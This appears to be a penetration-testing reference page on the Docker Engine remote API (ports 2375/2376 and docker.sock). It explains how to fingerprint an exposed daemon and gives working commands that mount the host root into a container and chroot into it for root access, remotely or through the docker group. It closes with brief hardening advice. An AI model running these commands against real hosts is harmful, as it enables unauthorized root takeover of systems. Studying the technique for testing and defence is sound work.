Docker API
aka dockerd, docker.sock
Docker Engine remote API on 2375 (or the local docker.sock). Unauthenticated access, or membership of the docker group, means root on the host by mounting / into a container.
Ports
| Port | Proto | Notes |
|---|---|---|
2375 | tcp | Docker API (no TLS, unauthenticated) |
2376 | tcp | Docker API (TLS) |
Fingerprint
- curl http://<host>:2375/version returns engine info
- Locally: /var/run/docker.sock present and accessible
Key files
| Path | Holds | Sensitive |
|---|---|---|
/var/run/docker.sock | the local Docker control socket (root-equivalent) | sensitive |
Default / weak creds
none on an exposed 2375
Service users
membership of the docker group equals root
Exploitation primitives
- Run a container that bind-mounts the host root (-v /:/host) and chroot in for full host access as root
- Same trick locally via docker.sock or the docker group during privesc
Overview
The Docker daemon is root. Anything that can talk to it (an exposed 2375, the docker.sock, or the docker group) can start a privileged container and own the host.
Host takeover
List images on an exposed daemon:
docker -H tcp://<TARGET>:2375 imagesMount the host root and chroot in:
docker -H tcp://<TARGET>:2375 run -v /:/host -it alpine chroot /host shLocal privesc variant (docker group / socket):
docker run -v /:/mnt --rm -it alpine chroot /mnt shHardening
Never expose 2375, require TLS client certs on 2376, and treat docker-group membership as root.